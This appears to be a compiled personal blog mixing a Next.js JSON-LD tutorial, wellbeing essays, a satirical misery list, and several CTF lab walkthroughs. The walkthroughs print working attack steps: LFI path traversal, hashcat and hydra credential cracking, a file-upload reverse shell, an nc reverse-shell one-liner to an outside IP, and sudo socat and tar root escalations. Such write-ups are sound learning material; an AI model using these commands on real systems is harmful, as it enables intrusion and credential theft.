JSON-LD stands for JavaScript Object Notation for Linked Data. It’s a way to describe your website’s content so that search engines understand not just what’s on the page but how everything is connected.

It uses regular JSON format to embed structured data in your HTML via a
<script type="application/ld+json"> tag. This script isn’t visible to users but helps Google identify key information like authors, recipes, events, products, and more.

Why does this matter?

Because it enables rich results, enhanced search listings with star ratings, images, FAQs, and more. These can significantly boost your site's performance:

• Rotten Tomatoes added structured data to 100,000 pages and saw a 25% higher click-through rate on enhanced pages.

• The Food Network enabled search features on 80% of its pages and observed a 35% increase in visits.

• Rakuten found users spent 1.5x more time and had a 3.6x higher interaction rate on AMP pages with structured data.

• Nestlé reported an 82% higher click-through rate for pages showing rich results.

In short: JSON-LD helps your content stand out in search, improves click-through rates, and gives users more reason to engage with your site.

Read More:

• json-ld.org

• Google’s guide to structured data

LD-JSON in Next.js App Router – The Problem

Next.js provides official guidance on using JSON-LD with the App Router, introduced in Next.js 13. However, there’s a subtle but important issue.

When you add a
<script type="application/ld+json"> tag directly in a server component, it gets rendered twice:

1. Once on the server – as part of the initial HTML.

2. Again on the client – during hydration, when React re-renders the component.

This results in duplicate JSON-LD tags, which can confuse tools like Google’s Structured Data Testing Tool. It might flag the duplication, or it might just ignore your markup altogether.

Why does this happen?

Because React Server Components embed data in the HTML, but then React hydrates and re-renders the page on the client, thus injecting your schema again.

This is a known issue with Next.js in certain setups.

What’s the Fix?

The solution: create a custom client component that checks if the schema tag is already present in the DOM before rendering it.

The Solution: useSkipHydration Hook + SchemaRenderer Component

components/SchemaRenderer.tsx

"use client";

import { useEffect, useState } from "react";

const useSkipHydration = (id: string) => {
  const [skipHydration, setSkipHydration] = useState(false);

  useEffect(() => {
    if (document?.getElementById(id)) {
      setSkipHydration(true);
    }
  }, [id]);

  return skipHydration;
};

export default function SchemaRenderer({
  id,
  schema,
}: {
  id: string;
  schema: any;
}) {
  const skipHydration = useSkipHydration(id);

  if (skipHydration) return null;

  return (
    <script
      id={id}
      type="application/ld+json"
      dangerouslySetInnerHTML={{ __html: JSON.stringify(schema) }}
    />
  );
}

Use It in Your Page (Server Component)

app/[slug]/page.tsx

import SchemaRenderer from '@/components/SchemaRenderer';

const jsonLdData = {
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "Your Blog Title",
  "author": {
    "@type": "Person",
    "name": "John Doe"
  },
  "datePublished": "2025-06-01"
};

export default function BlogPage() {
  return (
    <>
      <article>
        <h1>Your Blog Content</h1>
      </article>

      <SchemaRenderer id="json-ld-blog" schema={jsonLdData} />
    </>
  );
}

Note: You won’t see the script tag in the DOM using browser devtools in development (npm run dev). Instead, check the page source or build with npm run build and run with npm run start to verify the script is correctly rendered.

Validating Your Structured Data

Use the following tools to ensure your schema is valid:

• Google Structured Data Guide

• Schema.org Validator

• Google Rich Results Test

• JSON-LD Playground

How This Fix Actually Works – Under the Hood

useSkipHydration Hook

const useSkipHydration = (id: string) => {
  const [skipHydration, setSkipHydration] = useState(false);

  useEffect(() => {
    if (document?.getElementById(id)) {
      setSkipHydration(true);
    }
  }, [id]);

  return skipHydration;
};

This hook checks after mounting whether a script tag with the given id already exists in the DOM.

Why it’s important:

• The server already injected the <script> tag.

• During hydration, React tries to render it again.

• This hook detects the presence and prevents a second render.

Conditional Rendering

if (skipHydration) return null;

If the tag is already present, skip rendering it again. This avoids duplication of the script tags.

Rendering the Schema

<script
  id={id}
  type="application/ld+json"
  dangerouslySetInnerHTML={{ __html: JSON.stringify(schema) }}
/>

If the script tag isn’t present, this renders it.
dangerouslySetInnerHTML is necessary to inject raw JSON into the script tag.

Final Thoughts: Structured Data Done Right in Next.js

Implementing JSON-LD is one of the simplest and most powerful ways to improve your site’s SEO:

✅ Unlocks rich search results
✅ Improves click-through rates
✅ Helps search engines deeply understand your content

But with React Server Components and hydration quirks, doing it naively can cause duplication and broken validation.

This approach solves that cleanly:

• ✅ Works with SSR + hydration

• ✅ Prevents duplicate <script> tags

• ✅ Keeps your schema clean and Google-friendly

Whether it’s a blog, a product page, or a full-fledged app, this method keeps your structured data robust, scalable, and SEO-optimized.

What is a CTF?

Capture the Flag (CTF) is like a cybersecurity treasure hunt where participants tackle various security-related tasks. These challenges can range from basic cryptography and reverse engineering to web exploitation and forensics. The main goal? To find hidden "flags" (usually strings of text) within these tasks.

What is Hacker101 CTF?

Hacker101 CTF is an awesome online platform from HackerOne, designed to help you learn and practice your hacking skills. It offers a variety of CTF challenges that mimic real-world security vulnerabilities and scenarios. It’s like a playground for aspiring ethical hackers to hone their skills in a safe and controlled environment.

And guess what? They’ve got a whole tutorial series to help you out, which you can check out here.

This first challenge is aptly named 'A Little Something to Get You Started'. The objective? Find a hidden flag on a simple webpage.

Challenge: A Little Something to Get You Started

Description: Your mission, should you choose to accept it, is to locate a hidden flag on a straightforward webpage. The URL will be generated dynamically when you begin the challenge.

Alright, let’s get cracking on this challenge and dive into the basics of web security and CTFs.

Step-by-Step Walkthrough

Step 1: Reconnaissance

1. Visit the URL: Fire up your web browser and head over to the generated URL. The page might look like a plain Jane, but we’re here to uncover its secrets.

   

2. View Page Source:

   • Right-click on the webpage and select "View Page Source" or use the keyboard shortcut Ctrl+U (on Linux/Windows) or Cmd+U (on Mac).

   • This will show you the HTML code of the page. Look for any hidden comments or scripts that might contain clues or the flag itself.

    <!doctype html>
    <html>
        <head>
            <style>
                body {
                    background-image: url("background.png");
                }
            </style>
        </head>
        <body>
            <p>Welcome to level 0.  Enjoy your stay.</p>
        </body>
    </html>

Hmm, it seems this webpage is loading a background image, but as we can see, the background is as barren as Vin Diesel’s scalp. How very curious!

Step 2: Check Linked Files

1. Look for Files:

   • Based on the styles in the HTML source, there's a mention of a background.png file.

2. Navigate to the Linked File:

   • Enter <generated_url>/background.png in your browser to view the content of background.png.

Step 3: Retrieve the Flag

1. Find the Flag on the page:

    ^FLAG^[REDACTED]$FLAG$
   

   Now we have the flag in our grasp. Let's move on to submitting the flag.

Step 4: Submit the Flag

1. Submit the Flag:

   • Go back to the Hacker101 CTF platform.

   • Navigate to the flag submission page.

   • Enter the flag in the submission field.

If the flag is correct, you will see a confirmation message, and points will be awarded to your account.

Additional Tips

• Pay Attention to Details: Sometimes, the smallest detail in the source code or the challenge description can point you in the right direction.

• Practice Regularly: The more challenges you complete, the more familiar you will become with common patterns and techniques used in CTFs.

Conclusion

Congratulations on completing your first challenge! "A little something to get you started" is just the beginning. As you progress, the challenges will become more complex and require more advanced techniques. Keep practicing, stay curious, and enjoy the journey of becoming a proficient ethical hacker. Happy hacking!

Human beings are not made to stay cooped up inside a small room with artificial lighting all day. The smooth functioning of our Circadian Rhythm requires us to have some interaction with the daylight.

Seeing the sun for 10 minutes in the morning and in the evening primes your brain to be more accurate to the natural human sleep cycle, which is: work in the day, sleep in the night. You can take 10 minutes out of your busy schedule.

If unable to get sunlight for any reason, simulate daylight with your artificial lighting. Keep it stronger and overhead during the day, dimming it when approaching the evening.

Don’t seek continuous input, take time to process

We are creatures that need time and space to process what we experience and think on our own. Scheduling some time for yourself each day to reflect and think deeply can help you to stay in touch with your emotions and be more mindful of your inner thoughts.

This practice can help you to gain clarity and understanding about the things happening in your life, and can help to reduce the amount of stress and anxiety that often come from feeling overwhelmed.

When processing, make sure to focus on one thing at a time. Trying to multitask can often cause more confusion than clarity. Take your time and let yourself process your thoughts and feelings.

Get moving

Exercise is an important part of living a healthy life. Not only does it help to keep your body healthy, but it also helps to reduce stress and anxiety. Even if you can’t make it to the gym, there are ways to get some physical activity in during your day. Taking a walk or a jog in the park, joining a dance class, or even doing some simple exercises at home can all be beneficial to your mental and physical well-being.

Physical activity is also a great way to clear your mind and gain some perspective. Taking a few moments to yourself to get your body moving can help to relieve stress and give you the clarity to tackle any problem that comes your way.

Make time for your hobbies

Taking the time to engage in activities that you enjoy can help to reduce stress, clear your mind, and give you a sense of purpose and accomplishment. Whether it’s painting, reading, playing a musical instrument, or anything else that you enjoy, taking some time for yourself to do something you love can help to make life more enjoyable.

Having hobbies also helps to give you a sense of identity and can help to keep you from feeling overwhelmed. Whether you do them alone or with friends, participating in activities that you enjoy can help to give you a break from the daily grind and help to keep you feeling happy and fulfilled.

Connect with nature

Getting out in nature is a great way to reduce stress and reconnect with yourself. Taking a walk in the park or going for a hike in the woods can help to clear your mind and give you a break from the hustle and bustle of daily life.

Being in nature can also help you to appreciate the beauty of the world around you and can help to give you a sense of peace and calm. Whether it’s sitting in the park listening to the birds, or taking a dip in the lake, taking some time out of your day to connect with nature can make a huge difference in your life.

Take care of your mind and body

Taking care of your mind and body is essential for living a better life. Taking the time to exercise regularly and eat a balanced diet can help to keep you healthy and energized. It can also help to reduce stress, improve your mood, and give you more energy to get through the day.

Getting enough sleep and taking the time to relax are also important for your physical and mental health. Taking time out to do things you enjoy, such as reading, meditating, or going for a walk, can help to relieve stress and give you a sense of peace and satisfaction.

Reduce screen time

Spending too much time looking at screens can be damaging to both your physical and mental well-being. We are constantly bombarded with information and messages that can be overwhelming and exhausting. Taking a break from technology and giving yourself some time away from screens can help to restore your sense of balance and clarity.

Limiting your screen time can also help to improve your mental health and reduce stress. Taking a break from technology can help to give you a sense of peace and can help to make your life more enjoyable.

Making a conscious effort to reduce your screen time can help to make your life more meaningful and enjoyable.

Spend time with people you care about

Having strong relationships with the people you care about can help to make life more enjoyable. Taking the time to connect with family and friends can help to create a sense of community and belonging, and can help to provide emotional support and companionship.

Spending time with the people you care about can also help to reduce stress, improve your mood, and make life more meaningful. Whether it’s having a conversation over coffee, or taking a trip together, making time to spend with the people you love can make life more enjoyable and fulfilling.

1. Be as lazy as possible

Being lazy is easy, so take the easy route. Stay inside and don't do anything productive. If you start exercising, for example, you might build momentum and become more energetic, so make sure not to do that.

2. Become a vampire

Don't ever go outside or let sunlight touch you. Stay up late at night to mess up your circadian rhythm so that you have less energy throughout the day. This will help you feel like garbage.

3. Avoid water, prioritise snacks & sugary drinks

Eat junk food and fast food as often as possible, at least once per day. Make sure to have milkshakes, sodas, and energy drinks to top it off. Getting those spikes of insulin and caffeine will help you have massive crashes throughout the day, ensuring you become more unproductive throughout the day.

4. Habits are natural. Either develop bad ones or don't think about them at all

Some people deliberately analyse what habits they have to fix them. Don't be like that. Ignorance is bliss, so convince yourself that all your habits are perfect the way they are. If you notice you have "bad" habits, don't try to fix them. Let them be.

5. Confuse your brain

While you should already be staying inside at all times, make sure to confuse your brain by combining all your activities in one place. Work where you sleep, sleep where you eat, and eat where you relax. That way, if you need to accomplish a specific task, your brain will mix up what it should be doing, so you might eat instead of work, and you'll never get it done.

6. Create vague and unachievable goals

Make sure your goals are impossible to achieve. If you're earning $5k per month, make sure your goal is $1 million next month. Or better yet, don't even set a time frame. Have the dream of becoming a millionaire without creating a specific plan on how to approach that goal. Just have it in the back of your mind forever, and tell yourself you won't be happy until you achieve that goal.

If, for some reason, you decide to create a specific goal (gross), focus on the future steps first. Want to build a company? Focus on scaling and marketing before you actually make sure your product provide value. Question if your current workflow will be efficient when you get to 100k users before you even reach 10.

7. Be antisocial

Avoid interactions at all costs. Go weeks at a time without talking to your friends or family. Embrace isolation. You'll feel completely alone. This will enhance that feeling of depression.

8. Focus on dopamine traps

Video games, gambling, drinking, smoking, or porn. Do them all. Focus on the unfulfilling and time-wasting activities that help make the days go by a little faster. They feel great temporarily, and hedonism is what you should focus all of your time on. Sometimes people do these in moderation. Avoid self-control and go all out. Don't set limits for yourself.

9. Make excuses and avoid responsibility

If you justify actions you know are bad, great! Keep doing that. Make sure you aren't responsible for anything in your life and blame the world for what's happening to you. If you give up control of your life, you'll feel dis-empowered which directly leads to unhappiness.

Along with this, consume as much news as possible. That will help with this. You'll feel like the world is spiralling downward and you can't do anything about it. You will feel as though you have no control over anything, which is exactly what you need.

10. Talk down on yourself

Make sure your internal monologue is always negative. Criticise yourself on every action and mistake you make. Always highlight the flaws, and never, under any circumstances, compliment yourself for anything. Practice pessimism at all times. Optimism gives hope, and hope breeds action. So you must avoid optimism entirely.

11. Doubt yourself

Any time you're about to try something new, whether starting a business or asking someone out, instil fear. Tell yourself it won't work before even starting. Hold yourself back.

12. Argue with everyone. Fight about everything. Especially on the internet.

Twitter is great for this. Find all the people who have strong opinions, and make sure to argue and insult them. It doesn't matter who's right or wrong, just make sure you really show that hatred. It doesn't matter how minuscule the topic is, fight about anything you disagree with. Share your opinions about everything. Don't acknowledge the fact that they have the same goal as you: maximising misery. That leads to empathy which you should not have. Make sure you're always angry about something.

13. Be theatrical. Play those status games.

Focus on acting woke and put yourself on a pedestal. Satisfy that ego and chase after likes. Show how smart and perfect you are by criticising and belittling others, and make sure to never forgive people for their mistakes.

Don't do anything that actually makes an impact, otherwise you'll start to feel fulfilled.

14. Maximise screen time

Don't read or walk outside. Make sure you're constantly on social media, watching videos and movies, and never taking your eyes off of it. Multitask different websites simultaneously. Watch YouTube on your laptop while scrolling through Reddit on your phone.

15. Be complacent and don't take risks

Make sure you're never striving to improve. Successful people find a healthy balance between improvement and gratitude. Make sure you focus on one or the other completely. Focus solely on improvement, and it'll never be enough. Focus solely on gratitude, and you'll become complacent.

Avoid risks and change at all costs. Stick with the familiar and never move outside of your comfort zone. You'll limit your experiences in life, and maybe you'll get to see them through other people's lives on social media. You'll know exactly what you're missing out on, but you'll be too afraid to go after it. It will spiral down into self-hatred, which is what you need.

16. Compare yourself with others

You see someone living an amazing life? Make sure to question why they have that life. Sure, you may be 20 and he's 25. That doesn't matter. Ask yourself why you don't have that now. You see someone who's the same age as you yet he's doing so much better? Make sure to doubt yourself. Don't track your own improvements each day, focus only on what other people are doing. Your progress will slow down while comparing yourself against others which will only make this feel drastically worse.

17. Expect permanence

Expect that everything will last forever for you. That nice house and all that money you have? You'll have it forever. Don't worry about losing it. If you understand that everything is impermanent, you'll start being grateful which you must avoid!

Always upgrade your quality. You just got a $100k car? Focus on buying a $500k car next. That way, the $100k will never feel as great as on the first day you got it.

18. Search for the zero-sum games

Don't look for ways to benefit both parties. Find ways to profit more, especially at the expense of others. If it comes a negative-sum game where you're dealing with a war of attrition, so be it. At least the other party isn't doing better than you.

19. Focus on the short term

We all know long term is better. But that's harder and we must avoid difficulty at all costs. Embolden the impatient personality of yours and chase after the quick fixes instead. It satisfies that impatience and feels better in the moment.

20. Judge others

We all have an ego we need to satisfy. Make sure to boost yourself up, especially at the expense of others. Embrace negativity and judge others for how they look or what they do. Don't try to think positively about others, that's harder and more fulfilling. Make sure to chase after that superficial superiority complex.

I wrote this for myself as a reminder that many of the things I do are not helping me improve. They hold me back, and reframing it as a "How To" guide on becoming miserable actually motivates me more to avoid these directives. If you catch yourself doing any of these, you now have the awareness which is always the first step. Fixing these takes work, which as I said before, is hard. But everyone has the ability to overcome these, you just have to strategize your approach.

Inspired by CGP Grey.

What is the user flag?

First, we will enumerate our target.

❯ nmap -sV 10.10.85.254
Nmap scan report for 10.10.85.254
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.98 seconds

As we can see, two ports are open on our target machine, port 22 for ssh and port 80 with http. Let's see what we have on port 80.

That's a pretty cute blog right there. As we are interested in LFI, let's view its details.

Um...We have this very well presented blog about LFI attacks. It seems to include details about Directory Traversal along with its example. Lets give it a try, shall we?

http://10.10.85.254/article?name=../../../../etc/passwd

Well well well, what do we have here ;)

A commented out user:passwd pair is present. I wonder where it could be used. SSH maybe?

falconfeast@inclusion:~$ ls
articles user.txt
falconfeast@inclusion:~$ cat user.txt
[REDACTED]

What is the root flag?

Now its time to escalate priviledges. Lets see what we can run as root.

falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
(root) NOPASSWD: /usr/bin/socat

I think GTFOBins may have something that can help us.

sudo socat stdin exec:/bin/sh

Lets plug that into the terminal.

falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
whoami
root
cd /root
ls
root.txt
cat root.txt
[REDACTED]

What is the user flag?

First, we will enumerate our target.

❯ nmap -sV 10.10.39.105
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 11:35 IST
Nmap scan report for 10.10.39.105
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

As we can see, two ports are open on our target machine, port 22 for ssh and port 80 with http. Let's see what we have on port 80.

It is an Apache2 Ubuntu Default Page. Now we use gobuster to enumerate any directories this server might have.

❯ gobuster dir -u 10.10.39.105 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.html            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/content              (Status: 301) [Size: 314] [--> http://10.10.39.105/content/]
/index.html           (Status: 200) [Size: 11321]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 277]

We have found a /content subdirectory.

Let's enumerate it too.

❯ gobuster dir -u 10.10.39.105/content -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.html            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/_themes              (Status: 301) [Size: 322] [--> http://10.10.39.105/content/_themes/]
/as                   (Status: 301) [Size: 317] [--> http://10.10.39.105/content/as/]
/attachment           (Status: 301) [Size: 325] [--> http://10.10.39.105/content/attachment/]
/changelog.txt        (Status: 200) [Size: 18013]
/images               (Status: 301) [Size: 321] [--> http://10.10.39.105/content/images/]
/inc                  (Status: 301) [Size: 318] [--> http://10.10.39.105/content/inc/]
/index.php            (Status: 200) [Size: 2198]
/index.php            (Status: 200) [Size: 2198]
/js                   (Status: 301) [Size: 317] [--> http://10.10.39.105/content/js/]
/license.txt          (Status: 200) [Size: 15410]

We have found some interesting files. Let's check the changelog.txt.

#############################################
SweetRice - Simple Website Management System
Version 1.5.0
Author:Hiler Liu steelcal@gmail.com
Home page:http://www.basic-cms.org/
#############################################
New web - new SweetRice for both PC & mobile website creator,easy way to follow the new web world.

========================================

We know now that the target machine is using SweetRice CMS V1.5.0. Let's search Exploit-DB for a vulnerability we can exploit.

We find a Backup Disclosure vulnerability. Let's use it to exploit this CMS.

We download and open the mysql_bakup_20191129023059-1.5.1.sql file.

We now have a username and a password hash. Let's crack the hash using hashcat.

❯ hashcat -a 0 -m 0 lazyhash.txt /usr/share/wordlists/rockyou.txt

42f749ade7f9e195bf475f37a44cafcb:[REDACTED]

So we now have both the username and the password. Let's log into the admin panel.

We now have to set the website status to Running so that we can access the site.

There's nothing interesting on the site itself. Let's look if there's another vulnerability we can exploit.

We have found an Arbitrary File Upload vulnurablity. We can exploit it to upload a reverse shell script and gain access to the target machine.

We're going to use pentestmonkey's reverse ssh php script.

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.39.105/content/attachment/shell.php5

p.s : if it doesn't seem to work, try to hardcode the values in the code.

Now we start a netcat listener on the specified port to connect to the reverse shell.

❯ nc -nlvp 1234
Connection from 10.10.39.105:44046
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 09:34:23 up 33 min,  0 users,  load average: 0.00, 0.01, 0.24
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Annddddd we're in.

Let's navigate the file system to find the user.txt.

$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
[DATA EXPUNGED]

What is the root flag?

We now have to escalate our priviledge and gain root access on this machine.

Let's check what commands we can run.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

We can run the perl file backup.pl. Let's check what's in it.

$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

The backup.pl script executes /etc/copy.sh. What's in there i wonder.

$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

We can run this file as root, so if we create a reverse shell using this file, we can get root access to the target machine from our host macine.

We already have a reverse shell script on this machine, so why not reuse it.

$ echo 'php /var/www/html/content/attachment/shell.php5' > /etc/copy.sh

Now we have to run backup.pl as root.

$ sudo /usr/bin/perl /home/itguy/backup.pl
$ Successfully opened reverse shell to 10.17.15.106:1234

We now have root access to this machine. All we have to do is to locate root.txt (it is usually found in /root).

❯ nc -nlvp 1234
Connection from 10.10.39.105:44052
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 09:46:00 up 44 min,  0 users,  load average: 0,00, 0,00, 0,09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
[DATA EXPUNGED]

Find open ports on the machine

We will use nmap to do a quick scan of the machine for open ports.

❯ nmap -sV $IP
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Who wrote the task list?

To find out who wrote it, we first have to find the task list itself. Let's check the hint for this task, which is "Have you visited FTP?". First let's check if anonymous login is enabled for ftp. Yes it is. Great, now we can copy over the text files we find to our system using the get command.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 07  2020 .
drwxr-xr-x    2 ftp      ftp          4096 Jun 07  2020 ..
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp>

Now let's see the contents of the task.txt.

❯ cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

We can see that the rather surreal sounding tasks have been written by "lin". This may potentially be a username that can be used later.

Let's look into locks.txt now. Looks like it is a list of passwords. It'll come in handy while brute-forcing the password.

❯ cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e

What service can you bruteforce with the text file found?

Now let's take a look at the hint for the next task. "What is on port 22?". SSH.

Let's brute force the ssh port using hydra. We use lin as the username and the retrieved locks.txt as our wordlist.

❯ hydra -l lin -P locks.txt $IP ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

[22][ssh] host: 10.10.246.11   login: lin   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found

Okay, we have the password now. Let's try to ssh into the machine using these credentials.

Lets look around the system for a bit. On checking the home directory, we find the user.txt. Well, that was easy.

Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

83 packages can be updated.
0 updates are security updates.

lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
[DATA EXPUNGED]

Now to find root.txt, we have to escalate our privileges and gain root access to the system. To get started, we type sudo -l to see what commands our current user can run as root.

lin@bountyhacker:~/Desktop$ sudo -l
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

As we can see, lin can run /bin/tar as root. Lets head over to GTFOBins and look for an exploit for this binary that can help us break out and gain a root shell. On searching for tar on the site, we get the following command.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Lets pop that into the shell and see what happens. Hmm, it seems we have successfully gained root access.

Now we use the find command to locate root.txt.

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/` from member names
# whoami
root
# find / -name "root.txt" 2>/dev/null
/root/root.txt
# cat /root/root.txt
[DATA EXPUNGED]

So there you have it. We have finally completed the room. This was an easy room, so beginners like me shouldn't have much problems with it. If you couldn't do it by yourself though, don't lose hope, the path is full of learning opportunities. Hope you learned something new today. Adios.